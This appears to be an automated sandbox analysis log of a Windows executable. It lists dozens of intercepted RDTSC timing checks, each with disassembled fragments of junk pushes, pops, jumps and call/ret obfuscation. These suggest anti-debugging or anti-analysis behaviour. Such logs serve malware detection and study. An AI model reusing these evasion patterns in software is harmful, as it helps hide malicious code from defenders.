Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4484 second address: EB44EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDAC0B0C7F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FDAC0B0C7FAh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FDAC0B0C7F8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov edx, ecx 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D246Ch], ebx 0x00000038 call 00007FDAC0B0C7F9h 0x0000003d jmp 00007FDAC0B0C7FEh 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push ecx 0x00000046 pushad 0x00000047 popad 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB44EA second address: EB4505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4505 second address: EB4532 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FDAC0B0C7F6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FDAC0B0C806h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4532 second address: EB4536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4536 second address: EB4540 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4540 second address: EB4544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4544 second address: EB45AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FDAC0B0C7F8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000003h 0x00000024 xor dl, FFFFFF9Ah 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FDAC0B0C7F8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 push 00000003h 0x00000045 mov ecx, dword ptr [ebp+122D38FBh] 0x0000004b sbb di, CA00h 0x00000050 push B3BCFB0Ch 0x00000055 push ebx 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB45AE second address: EB45B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E939DC second address: E939E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007FDAC0B0C7F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED2C87 second address: ED2CA2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDAC110B286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAC110B28Dh 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED2CA2 second address: ED2CCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C800h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDAC0B0C802h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED3107 second address: ED310B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED310B second address: ED315E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 jmp 00007FDAC0B0C809h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edi 0x00000014 jmp 00007FDAC0B0C804h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jo 00007FDAC0B0C802h 0x00000022 jnc 00007FDAC0B0C7F6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED315E second address: ED3162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED34A5 second address: ED34B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 jmp 00007FDAC0B0C7FDh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED3629 second address: ED3632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED38FF second address: ED3908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED3908 second address: ED3912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDAC110B286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EC9629 second address: EC9633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDAC0B0C7F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EC9633 second address: EC9637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED46F9 second address: ED4704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4704 second address: ED4708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4708 second address: ED4732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FDAC0B0C814h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4732 second address: ED4746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC110B290h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED49C9 second address: ED49CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED49CD second address: ED49D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4D0C second address: ED4D1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007FDAC0B0C7F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4D1D second address: ED4D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4D28 second address: ED4D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAC0B0C809h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED4D4A second address: ED4D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FDAC110B286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8C68 second address: ED8C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FDAC0B0C803h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007FDAC0B0C7F6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8C92 second address: ED8C97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8C97 second address: ED8C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8DE0 second address: ED8DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8DE5 second address: ED8DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8DEB second address: ED8E2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007FDAC110B29Dh 0x0000000f jmp 00007FDAC110B297h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007FDAC110B294h 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8E2F second address: ED8E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: ED8E37 second address: ED8E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FDAC110B28Fh 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9A420 second address: E9A424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9A424 second address: E9A436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007FDAC110B286h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9A436 second address: E9A458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FDAC0B0C807h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EDF745 second address: EDF753 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EDFA5A second address: EDFA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EDFA62 second address: EDFA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE0059 second address: EE006D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FDAC0B0C7F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE006D second address: EE0071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE1CC3 second address: EE1CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE1CC7 second address: EE1D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 12E415F2h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FDAC110B288h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov dword ptr [ebp+124553D7h], edi 0x0000002d push F920948Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 js 00007FDAC110B288h 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE1F36 second address: EE1F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C7FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE29CE second address: EE29D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE2ABA second address: EE2ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE2ABE second address: EE2AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007FDAC110B28Eh 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE2AD8 second address: EE2ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE2D76 second address: EE2D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE3C31 second address: EE3C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE59B2 second address: EE59E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FDAC110B28Fh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FDAC110B294h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007FDAC110B286h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE59E9 second address: EE5A45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b jnc 00007FDAC0B0C7FCh 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D36DBh] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FDAC0B0C7F8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 sub dword ptr [ebp+1245873Ah], ebx 0x0000003b xchg eax, ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FDAC0B0C7FAh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE5A45 second address: EE5A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAC110B293h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE8541 second address: EE859F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C808h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push edx 0x0000000e jl 00007FDAC0B0C7F9h 0x00000014 movsx edi, bx 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007FDAC0B0C7F8h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 mov si, cx 0x00000039 push eax 0x0000003a push eax 0x0000003b je 00007FDAC0B0C7FCh 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EE62E0 second address: EE62E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB276 second address: EEB280 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDAC0B0C7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB280 second address: EEB2AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FDAC110B28Dh 0x00000010 pushad 0x00000011 jng 00007FDAC110B286h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB837 second address: EEB83B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB83B second address: EEB841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB841 second address: EEB84B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDAC0B0C7F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB84B second address: EEB84F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EEB84F second address: EEB85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F36E17 second address: F36E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F37334 second address: F3733D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3733D second address: F37347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDAC110B286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F37347 second address: F37361 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C806h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F37361 second address: F37383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FDAC110B28Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FDAC110B286h 0x00000014 ja 00007FDAC110B286h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3E430 second address: F3E44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDAC0B0C807h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3CD2D second address: F3CD41 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDAC110B28Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3CFD3 second address: F3CFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3CFD7 second address: F3CFE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jo 00007FDAC110B286h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3CFE9 second address: F3D010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C802h 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FDAC0B0C7F6h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D2BB second address: F3D2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D2C1 second address: F3D2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDAC0B0C809h 0x0000000c jmp 00007FDAC0B0C802h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D2F3 second address: F3D304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D304 second address: F3D30F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FDAC0B0C7F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D30F second address: F3D31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FDAC110B286h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D5C6 second address: F3D5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FDAC0B0C7FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
